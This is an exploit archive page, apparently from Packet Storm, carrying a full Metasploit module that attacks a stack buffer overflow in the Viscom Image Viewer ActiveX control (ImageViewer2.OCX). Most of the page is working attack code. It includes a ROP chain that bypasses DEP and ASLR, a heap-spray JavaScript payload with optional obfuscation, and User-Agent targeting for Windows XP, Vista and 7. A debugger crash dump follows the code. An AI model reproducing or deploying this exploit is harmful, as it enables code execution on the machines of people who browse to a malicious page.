what you don't know can hurt you

Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control

Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control
Posted Nov 17, 2011
Authored by Dr_IDE, mr_me, TecR0c | Site metasploit.com

This Metasploit module exploits a stack based buffer overflow in the Active control file ImageViewer2.OCX by passing a overly long argument to an insecure TifMergeMultiFiles() method. Exploitation results in code execution with the privileges of the user who browsed to the exploit page. The victim will first be required to trust the publisher Viscom Software. This Metasploit module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7 with Java support.

tags | exploit, java, overflow, code execution
MD5 | 4682a02bd6d485a684e4c2af85471375

Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info = {})
super(update_info(info,
'Name' => 'Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control',
'Description' => %q{
This module exploits a stack based buffer overflow in the Active control file
ImageViewer2.OCX by passing a overly long argument to an insecure TifMergeMultiFiles()
method. Exploitation results in code execution with the privileges of the user who
browsed to the exploit page.

The victim will first be required to trust the publisher Viscom Software.
This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7
with Java support.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Dr_IDE', # Vulnerability discovery and original exploit
'TecR0c', # Metasploit module
'mr_me' # Metasploit module
],
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/15668/' ],
[ 'URL', 'http://secunia.com/advisories/42445/' ],
[ 'URL', 'http://xforce.iss.net/xforce/xfdb/63666' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'false',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00"
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'Windows XP IE6-7', {} ],
[ 'Windows XP IE8, Windows Vista & Windows 7 + JAVA 6 (DEP & ASLR BYPASS)', {} ]
],
'DisclosureDate' => 'Mar 03 2010',
'DefaultTarget' => 0))

register_options(
[ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) ], self.class)
end

# Prevent module from being executed in autopwn
def autofilter
false
end

def check_dependencies
use_zlib
end

def junk(n=4)
return rand_text_alpha(n).unpack("L")[0].to_i
end

def on_request_uri(cli, request)

# Set target manually or automatically
my_target = target
if my_target.name == 'Automatic'
agent = request.headers['User-Agent']
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
my_target = targets[1] # XP
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
my_target = targets[1] # XP
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
my_target = targets[2] # XP
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
my_target = targets[2] # Vista
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8\.0/
my_target = targets[2] # Vista
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
my_target = targets[2] # Win7
end
end

sploit = rand_text_alpha(52)
pivot = [0x12AE0FE4].pack("V") # Address to my code

if my_target.name =~ /IE8/

code =
[ # MSVCR71.dll - rop chain generated with mona.py
0x7C37653D, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
0xFFFFFDFF, # Value to negate, will become 0x00000201 (dwSize)
0x7C347F98, # RETN (ROP NOP)
0x7C3415A2, # JMP [EAX]
0xFFFFFFFF, #
0x7C376402, # Skip 4 bytes
0x7C351E05, # NEG EAX # RETN
0x7C345255, # INC EBX # FPATAN # RETN
0x7C352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
0x7C344F87, # POP EDX # RETN
0xFFFFFFC0, # Value to negate, will become 0x00000040
0x7C351EB1, # NEG EDX # RETN
0x7C34D201, # POP ECX # RETN
0x7C38B001, # &Writable location
0x7C347F97, # POP EAX # RETN
0x7C37A151, # Ptr to &VirtualProtect() - 0x0EF
0x7C378C81, # PUSHAD # ADD AL,0EF # RETN
0x7C345C30, # Ptr to 'push esp # ret
].pack("V*")

code << payload.encoded
sploit << [0x100EAD78].pack("V") # POP ESP # RETN [IMAGEV~1.OCX]

else
code = payload.encoded
sploit << pivot
end

# Payload in JS format
code = Rex::Text.to_unescape(code)

sploit << [0x41414141].pack("V") # Filler
sploit << [0x42424242].pack("V") # Filler
sploit << [0x43434343].pack("V") # Filler
sploit << pivot

# Randomize the javascript variable names
vname = rand_text_alpha(rand(100) + 1)

spray = <<-JS
var heap_lib = new heapLib.ie(0x20000);
var code = unescape("#{code}");
var nops = unescape("%u0c0c%u0c0c");

while (nops.length < 0x2000) nops += nops;
var offset = nops.substring(0, 0x800-0x20);
var shellcode = offset + code + nops.substring(0, 0x2000-offset.length-code.length);

while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(0, (0x7fb00-6)/2);

heap_lib.gc();

for (var i = 0; i < 0x200; i++) {
heap_lib.alloc(block);
}

var overflow = unescape("#{sploit}");
var variable1 = "VARIABLE";

#{vname}.TIFMergeMultiFiles(variable1,variable1,overflow);
JS

# Use heaplib
js = heaplib(spray)

# Obfuscate on demand
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end

html = "<html>"
html << "\n<object classid='clsid:E589DA78-AD4C-4FC5-B6B9-9E47B110679E' id='#{vname}'></object>"
html << "\n\t<script>#{js}\n\t</script>\n</html>"

print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

# Transmit the response to the client
send_response_html(cli, html)

end

end
=begin
(460.1d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000fffd ebx=00000000 ecx=41414141 edx=6c440088 esi=00000010 edi=0204f5a8
eip=42424242 esp=0204f5b8 ebp=0204f644 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
41414141 ?? ???

0:005> dd @esp
0203f594 41414141 41414141 41414141 41414141
0203f5a4 41414141 41414141 41414141 41414141
=end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close